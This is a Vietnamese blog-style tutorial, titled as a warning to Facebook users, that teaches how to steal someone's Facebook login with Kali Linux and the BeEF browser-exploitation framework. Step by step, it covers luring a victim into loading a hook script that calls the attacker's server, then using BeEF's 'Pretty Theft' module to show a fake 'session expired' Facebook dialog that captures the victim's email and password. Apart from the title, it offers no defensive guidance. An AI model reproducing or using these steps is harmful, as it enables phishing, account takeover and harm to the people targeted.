Tất cả người dùng Facebook nên lưu ý điều này nếu bạn không muốn bị hack

Nhiều người đến với tìm cách hack Facebook mà không có kỹ năng cần thiết để làm điều đó.

Facebook không thể thiếu được, nhưng để làm được điều đó, bạn sẽ cần một số kỹ năng và phát triển kỹ năng .

Đôi khi, nếu bạn có một chút kỹ năng, và một chút kỹ thuật xã hội, bạn có thể nhận được thông tin đăng nhập của Facebook. Đó là những gì hướng dẫn này là tất cả về. Nếu bạn không dành thời gian để cài đặt Kali và tìm hiểu một chút về kết nối mạng và Linux , thì điều này sẽ không hiệu quả với bạn nhưng nếu bạn sẵn sàng dành một chút thời gian để học tại, bạn có thể có quyền truy cập đến thông tin đăng nhập Facebook của ai đó rất dễ dàng với thủ thuật nhỏ này.

Bước 1 Cài đặt Kali (Nếu bạn chưa hoàn thành)

Bước đầu tiên là tải xuống và cài đặt Kali Linux . Điều này có thể được thực hiện như một hệ điều hành độc lập, khởi động kép với hệ thống Windows hoặc Mac của bạn hoặc trong một máy ảo bên trong hệ điều hành mà bạn chọn. Không, điều này không thể được thực hiện với Windows! Windows, với tất cả các điểm mạnh và dễ sử dụng, không phải là một hệ điều hành hack thích hợp .

Trong Kali, có một ứng dụng gọi là Khung khai thác trình duyệt (BeEF) . Nó có khả năng giúp bạn hack trình duyệt của nạn nhân và kiểm soát nó. Một khi bạn có quyền kiểm soát trình duyệt của họ, có rất nhiều điều bạn có thể làm. Một trong số đó là lừa người dùng đưa ra thông tin đăng nhập Facebook của họ, điều mà tôi sẽ chỉ cho bạn ở đây.

Bước 2 Mở BeEF

Bật Kali, và bạn sẽ được chào đón với một màn hình như dưới đây. Bạn khởi động BeEF bằng cách nhấp vào biểu tượng con bò ở bên trái màn hình Kali.

Khi bạn nhấp vào nó, nó sẽ khởi động BeEF bằng cách mở một thiết bị đầu cuối.

BeEF là một ứng dụng chạy nền trên máy chủ web trên hệ thống của bạn mà bạn truy cập từ trình duyệt. Khi BeEF hoạt động và chạy, hãy mở trình duyệt IceWeasel của bạn để truy cập vào giao diện của nó. Bạn có thể đăng nhập vào BeEF bằng cách sử dụng thịt bò tên người dùng và mật khẩu thịt bò .( username beef password beef.)

Sau đó, bạn sẽ được chào đón bởi màn hình “Bắt đầu” của BeEF.

Bước 3 Móc trình duyệt của nạn nhân (Hook the Victim’s Browser)

Đây là một trò chơi quan trọng nhất, thậm chí có thể là phần khó khăn nhất của vụ hack này. Bạn phải khiến nạn nhân nhấp vào liên kết JavaScript được thiết kế đặc biệt để “nối” trình duyệt của họ. Điều này có thể được thực hiện theo vô số cách.

Cách đơn giản nhất là chỉ cần nhúng mã vào trang web của bạn và lôi kéo người dùng nhấp vào nó. Điều này có thể được thực hiện bằng văn bản như ” Bấm vào đây để biết thêm thông tin ” hoặc ” Bấm vào đây để xem video .” Sử dụng trí tưởng tượng của bạn.

Kịch bản trông giống như dưới đây. Nhúng nó vào một trang web và khi ai đó nhấp vào nó, bạn sở hữu trình duyệt của họ! (Nhận xét bên dưới nếu bạn có bất kỳ câu hỏi nào về vấn đề này; Bạn cũng có thể sử dụng MitMf để gửi mã cho người dùng, nhưng điều này đòi hỏi nhiều kỹ năng hơn.)

<script src = “http://192.168.1.101:3000/hook.js” type =” text / javascript “> </ script>

Từ đây, tôi sẽ cho rằng bạn đã “nối” trình duyệt của nạn nhân và sẵn sàng sở hữu nó.

Bước 4 Gửi Hộp thoại cho Người dùng

Khi bạn đã nối trình duyệt của nạn nhân, địa chỉ IP của nó, cùng với các biểu tượng loại hệ điều hành và trình duyệt, sẽ xuất hiện trong bảng “Trình duyệt móc nối” ở bên trái. Ở đây, tôi chỉ đơn giản là sử dụng trình duyệt của riêng tôi để chứng minh.

Nếu chúng ta nhấp vào trình duyệt được nối, nó sẽ mở giao diện BeEF ở bên phải. Lưu ý rằng nó cung cấp cho chúng tôi các chi tiết của trình duyệt ban đầu. Nó cũng cung cấp cho chúng tôi một số tab. Đối với mục đích của chúng tôi ở đây, chúng tôi quan tâm đến tab ‘Lệnh “.

Nhấp vào tab “Lệnh”, sau đó cuộn xuống “Cây mô-đun” cho đến khi bạn đến “Kỹ thuật xã hội” và nhấp để mở rộng nó. Nó sẽ hiển thị nhiều mô-đun kỹ thuật xã hội. Nhấp vào “Khá trộm”, sẽ mở ra một cửa sổ “Lịch sử kết quả mô-đun” và “Khá trộm”.

Mô-đun này cho phép bạn gửi một cửa sổ bật lên trong trình duyệt của người dùng. Trong trường hợp của chúng tôi, chúng tôi sẽ sử dụng hộp thoại Facebook.

Nếu chúng ta nhấp vào hộp “Loại hộp thoại”, chúng ta có thể thấy mô-đun này không chỉ có thể tạo hộp thoại Facebook mà còn cả hộp thoại LinkedIn, Windows, YouTube, Yammer và hộp thoại chung. Chọn loại hộp thoại Facebook, sau đó nhấp vào nút “Thực thi” ở phía dưới.

Bước 5 Hộp thoại Xuất hiện trên Hệ thống đích

Khi bạn nhấp vào “Thực thi” trong BeEF, một hộp thoại sẽ xuất hiện trong trình duyệt của nạn nhân như thế bên dưới. Nó nói với nạn nhân rằng phiên Facebook của họ đã hết hạn và họ cần nhập lại thông tin đăng nhập của họ.

Mặc dù bạn có thể nghi ngờ về một hộp bật lên như vậy, nhưng hầu hết người dùng sẽ tin rằng phiên Facebook của họ đã hết hạn và chỉ cần nhập email và mật khẩu của họ vào.

BeEF

Bước 6 Thu thập thông tin xác thực

Quay lại hệ thống của chúng tôi trong giao diện BeEf, chúng tôi có thể thấy thông tin đăng nhập xuất hiện trong cửa sổ “Kết quả lệnh”. Nạn nhân đã nhập địa chỉ email của họ “loveofmylife @ gmail” và mật khẩu của họ “sweetbippy” và họ đã bị bắt và trình bày cho bạn trong BeEF.

Nếu bạn thực sự quyết tâm để có được những thông tin đăng nhập Facebook đó, điều đó chắc chắn có thể được thực hiện và đây chỉ là một cách trong nhiều phương pháp (nhưng có lẽ là đơn giản nhất).